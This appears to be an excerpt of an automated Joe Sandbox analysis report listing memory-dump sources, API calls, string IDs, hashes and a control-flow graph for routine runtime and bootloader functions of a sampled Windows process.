                                                                                                                                                                                                  • Source File: 00000010.00000002.1552745719.00007FFEF6551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFEF6550000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552718521.00007FFEF6550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552781026.00007FFEF6561000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552810697.00007FFEF6568000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552843563.00007FFEF656C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ffef6550000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CallDeallocDict_Err_MallocMem_MemoryObjectObject_Update
                                                                                                                                                                                                  • String ID: X{}
                                                                                                                                                                                                  • API String ID: 3334104440-2140212134
                                                                                                                                                                                                  • Opcode ID: 993215c533787af24a8ddded9fa27fbbebaacf7f242f7e515d88610f26fd57d5
                                                                                                                                                                                                  • Instruction ID: f3abb9b8fb504da75485fbf63af702dbfc3f5566ed2305a7773e63fb0af44048
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 993215c533787af24a8ddded9fa27fbbebaacf7f242f7e515d88610f26fd57d5
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7B313731A0878286EB558F25D95827867A8EF45BD8F884930DA6D637F5DF3DE894C300

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Message
                                                                                                                                                                                                  • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                  • API String ID: 2030045667-2813020118
                                                                                                                                                                                                  • Opcode ID: 9a5e5245148448c4e614d040f8d0f58f792f1f660e446cb233f85b6b3462f215
                                                                                                                                                                                                  • Instruction ID: 81832dde202d38e4d4f7da31bc0e9f683556378acd50989647e193954972ffb4
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9a5e5245148448c4e614d040f8d0f58f792f1f660e446cb233f85b6b3462f215
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9351F622A18E8281EA64BB11A5413BAEA51FF867A4FD40135ED4D47BD5EF3CF449C720

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,00007FF7102DE3BA,?,?,-00000018,00007FF7102DA063,?,?,?,00007FF7102D9F5A,?,?,?,00007FF7102D524E), ref: 00007FF7102DE19C
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,?,?,00007FF7102DE3BA,?,?,-00000018,00007FF7102DA063,?,?,?,00007FF7102D9F5A,?,?,?,00007FF7102D524E), ref: 00007FF7102DE1A8
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                  • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                  • API String ID: 3013587201-537541572
                                                                                                                                                                                                  • Opcode ID: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
                                                                                                                                                                                                  • Instruction ID: 31a7087208fb00d03ff0818f0388ba8a4a6613ce3abad4646cabbebef260a9a0
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E141B222B19E0292FE16BB16A940676AA92BF45BB0FC94135DD1D57784EE3CFC0D8360

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 756 7ff7102dad6c-7ff7102dad92 757 7ff7102dad94-7ff7102dada8 call 7ff7102d43d4 call 7ff7102d43f4 756->757 758 7ff7102dadad-7ff7102dadb1 756->758 776 7ff7102db19e 757->776 760 7ff7102db187-7ff7102db193 call 7ff7102d43d4 call 7ff7102d43f4 758->760 761 7ff7102dadb7-7ff7102dadbe 758->761 778 7ff7102db199 call 7ff7102d9bf0 760->778 761->760 764 7ff7102dadc4-7ff7102dadf2 761->764 764->760 765 7ff7102dadf8-7ff7102dadff 764->765 768 7ff7102dae01-7ff7102dae13 call 7ff7102d43d4 call 7ff7102d43f4 765->768 769 7ff7102dae18-7ff7102dae1b 765->769 768->778 774 7ff7102db183-7ff7102db185 769->774 775 7ff7102dae21-7ff7102dae27 769->775 779 7ff7102db1a1-7ff7102db1b8 774->779 775->774 780 7ff7102dae2d-7ff7102dae30 775->780 776->779 778->776 780->768 783 7ff7102dae32-7ff7102dae57 780->783 785 7ff7102dae8a-7ff7102dae91 783->785 786 7ff7102dae59-7ff7102dae5b 783->786 787 7ff7102dae93-7ff7102daebb call 7ff7102dc90c call 7ff7102d9c58 * 2 785->787 788 7ff7102dae66-7ff7102dae7d call 7ff7102d43d4 call 7ff7102d43f4 call 7ff7102d9bf0 785->788 789 7ff7102dae82-7ff7102dae88 786->789 790 7ff7102dae5d-7ff7102dae64 786->790 819 7ff7102daebd-7ff7102daed3 call 7ff7102d43f4 call 7ff7102d43d4 787->819 820 7ff7102daed8-7ff7102daf03 call 7ff7102db594 787->820 817 7ff7102db010 788->817 791 7ff7102daf08-7ff7102daf1f 789->791 790->788 790->789 794 7ff7102daf21-7ff7102daf29 791->794 795 7ff7102daf9a-7ff7102dafa4 call 7ff7102e2c2c 791->795 794->795 798 7ff7102daf2b-7ff7102daf2d 794->798 806 7ff7102db02e 795->806 807 7ff7102dafaa-7ff7102dafbf 795->807 798->795 804 7ff7102daf2f-7ff7102daf45 798->804 804->795 809 7ff7102daf47-7ff7102daf53 804->809 815 7ff7102db033-7ff7102db053 ReadFile 806->815 807->806 811 7ff7102dafc1-7ff7102dafd3 GetConsoleMode 807->811 809->795 813 7ff7102daf55-7ff7102daf57 809->813 811->806 816 7ff7102dafd5-7ff7102dafdd 811->816 813->795 818 7ff7102daf59-7ff7102daf71 813->818 821 7ff7102db14d-7ff7102db156 GetLastError 815->821 822 7ff7102db059-7ff7102db061 815->822 816->815 825 7ff7102dafdf-7ff7102db001 ReadConsoleW 816->825 828 7ff7102db013-7ff7102db01d call 7ff7102d9c58 817->828 818->795 829 7ff7102daf73-7ff7102daf7f 818->829 819->817 820->791 826 7ff7102db173-7ff7102db176 821->826 827 7ff7102db158-7ff7102db16e call 7ff7102d43f4 call 7ff7102d43d4 821->827 822->821 823 7ff7102db067 822->823 831 7ff7102db06e-7ff7102db083 823->831 833 7ff7102db003 GetLastError 825->833 834 7ff7102db022-7ff7102db02c 825->834 838 7ff7102db17c-7ff7102db17e 826->838 839 7ff7102db009-7ff7102db00b call 7ff7102d4368 826->839 827->817 828->779 829->795 837 7ff7102daf81-7ff7102daf83 829->837 831->828 841 7ff7102db085-7ff7102db090 831->841 833->839 834->831 837->795 845 7ff7102daf85-7ff7102daf95 837->845 838->828 839->817 848 7ff7102db092-7ff7102db0ab call 7ff7102da984 841->848 849 7ff7102db0b7-7ff7102db0bf 841->849 845->795 856 7ff7102db0b0-7ff7102db0b2 848->856 852 7ff7102db0c1-7ff7102db0d3 849->852 853 7ff7102db13b-7ff7102db148 call 7ff7102da7c4 849->853 857 7ff7102db0d5 852->857 858 7ff7102db12e-7ff7102db136 852->858 853->856 856->828 860 7ff7102db0da-7ff7102db0e1 857->860 858->828 861 7ff7102db0e3-7ff7102db0e7 860->861 862 7ff7102db11d-7ff7102db128 860->862 863 7ff7102db103 861->863 864 7ff7102db0e9-7ff7102db0f0 861->864 862->858 866 7ff7102db109-7ff7102db119 863->866 864->863 865 7ff7102db0f2-7ff7102db0f6 864->865 865->863 868 7ff7102db0f8-7ff7102db101 865->868 866->860 867 7ff7102db11b 866->867 867->858 868->866
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                  • Opcode ID: 61b7c791dd7b4870e419cd94b23561cebff66563b6152af2ba6a1b175460b8f9
                                                                                                                                                                                                  • Instruction ID: c45be9521118ba2c1801180bd2584de96bd1d1b0d13ee4ad47e8844ab2311a14
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 61b7c791dd7b4870e419cd94b23561cebff66563b6152af2ba6a1b175460b8f9
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E4C1D323A0CE8791EA62AB1494606BEBF51FB90BA0FD54135EA5D03791DE7DFC4D8320

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(?,00007FF7102C3534), ref: 00007FF7102C3411
                                                                                                                                                                                                    • Part of subcall function 00007FF7102C29E0: GetLastError.KERNEL32(?,?,?,00007FF7102C342E,?,00007FF7102C3534), ref: 00007FF7102C2A14
                                                                                                                                                                                                    • Part of subcall function 00007FF7102C29E0: FormatMessageW.KERNEL32(?,?,?,00007FF7102C342E), ref: 00007FF7102C2A7D
                                                                                                                                                                                                    • Part of subcall function 00007FF7102C29E0: MessageBoxW.USER32 ref: 00007FF7102C2ACF
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Message$ErrorFileFormatLastModuleName
                                                                                                                                                                                                  • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                  • API String ID: 517058245-2863816727
                                                                                                                                                                                                  • Opcode ID: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
                                                                                                                                                                                                  • Instruction ID: d557c5c0d64bfbbfc7f67b05e50e1fbacd52890b3d961a2390a3753e35a45986
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A121A121B28D4281FA35BB24E9003BA9A50BF483B4FC04136D65D867D6EE2CF60D8730
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _get_daylight$_isindst
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 4170891091-0
                                                                                                                                                                                                  • Opcode ID: 8f9731ccc05e5e98dab1658fcebd939f282d40e9b6d5561daf5942648b351509
                                                                                                                                                                                                  • Instruction ID: 31faca23d657f6e774f824f46ca35c95a7c7f6333ea2be9f127d4fe23311b829
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8f9731ccc05e5e98dab1658fcebd939f282d40e9b6d5561daf5942648b351509
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1351D673F049118AEF18FF6499856BCABA5AB54378F900235DD2E52BE5DF38F8098710
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1552353019.00007FFEEE1C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFEEE1C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552320581.00007FFEEE1C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552509174.00007FFEEE2AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552536826.00007FFEEE2B2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ffeee1c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLast$__security_init_cookie
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2222513578-0
                                                                                                                                                                                                  • Opcode ID: d32f32be829c345f8424b6e50172c33a4feb856c6a1ec6dc64b44a65f2bf0592
                                                                                                                                                                                                  • Instruction ID: 534270b843dba3d0ffdc70f8c149f2af7edea1f8e4b6c4c80d4faca66058a6bd
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d32f32be829c345f8424b6e50172c33a4feb856c6a1ec6dc64b44a65f2bf0592
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3C51A120F0C25342FA686B64B95137961829FC87E1F174236D9DE466FBDFECB8814643
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2780335769-0
                                                                                                                                                                                                  • Opcode ID: 44011dbc5c196255e5d063134f532b0674048b95aab6dcf0e225215e54208c6d
                                                                                                                                                                                                  • Instruction ID: 0b0285ece993cf520da3bcccbba30a15fcde402c99843d68dce0a853e871825d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 44011dbc5c196255e5d063134f532b0674048b95aab6dcf0e225215e54208c6d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4D519023E18A418AFB14EF71D4503BDABA1EF58BA8F504136DE0957788DF38E8498720
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1279662727-0
                                                                                                                                                                                                  • Opcode ID: c9c3dc0ca6ff3025a18f37416ed5252826b5e2a6b8668c561ba6737191909872
                                                                                                                                                                                                  • Instruction ID: e649332815007ec6c8473e93cdf575f6007eedf6f01141f36c7b35628d47301a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c9c3dc0ca6ff3025a18f37416ed5252826b5e2a6b8668c561ba6737191909872
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9341A223D18B8243E754AB2195103B9AA60FB94774F509335EA9C03BD5DF7CF9E88720
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00007FFEEE1CDCF0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FFEEE1D34C9,?,?,?,00007FFEEE2139B1,?,?,?,?,00007FFEEE1D78EA,?,?,?), ref: 00007FFEEE1CDD38
                                                                                                                                                                                                  • InitializeCriticalSectionAndSpinCount.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FFEEE1DF39E,?,?,?,?,?,00007FFEEE1DF0A6), ref: 00007FFEEE215B8C
                                                                                                                                                                                                  • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0(?,?,?,?,00007FFEEE1DF39E,?,?,?,?,?,00007FFEEE1DF0A6), ref: 00007FFEEE215BA2
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1552353019.00007FFEEE1C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFEEE1C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552320581.00007FFEEE1C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552509174.00007FFEEE2AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552536826.00007FFEEE2B2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ffeee1c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressAllocCountCriticalHeapInitializeProcSectionSpin
                                                                                                                                                                                                  • String ID: InitializeCriticalSectionEx
                                                                                                                                                                                                  • API String ID: 1188775705-3084827643
                                                                                                                                                                                                  • Opcode ID: d50c9835e02574957e0a21de02abdf2f731f597d5daf9e2beef02907001a061a
                                                                                                                                                                                                  • Instruction ID: 1cb4032fdd2bbf45485a99932d18939d0fed74e2e4831fbb8b7e0e599fb21968
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d50c9835e02574957e0a21de02abdf2f731f597d5daf9e2beef02907001a061a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B141AF22B18B4282EA149F19F41077933A0FB88760F474735DAAD477E4DFBCE9558301
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3251591375-0
                                                                                                                                                                                                  • Opcode ID: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
                                                                                                                                                                                                  • Instruction ID: ddf28a72de9e08fb83a90676d194e05ea0adb1fec1b32f0de273226ca97cdbf1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B9317E21E1CD4B81FA25B76596213B99B40AF413A4FE44038E90D477D3DE6CB80CC731
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                                                                                  • Opcode ID: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
                                                                                                                                                                                                  • Instruction ID: 933592f460c471b03e391884f24003053d4098c61c06d964145c7e957d0776d8
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 44D06711B59E0A86EA553B705C5917A9A125FA8721B901438D84F1A3D3CD7CF80D4370
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                  • Opcode ID: 304c800bfc18b22a295e41f2f803514c44f0a5a87c6028a89610e4dcef950876
                                                                                                                                                                                                  • Instruction ID: 3d7f9f0e754b73921c49b44adc4021bb839c1b63d88923694cb4a1e9c2762cd1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 304c800bfc18b22a295e41f2f803514c44f0a5a87c6028a89610e4dcef950876
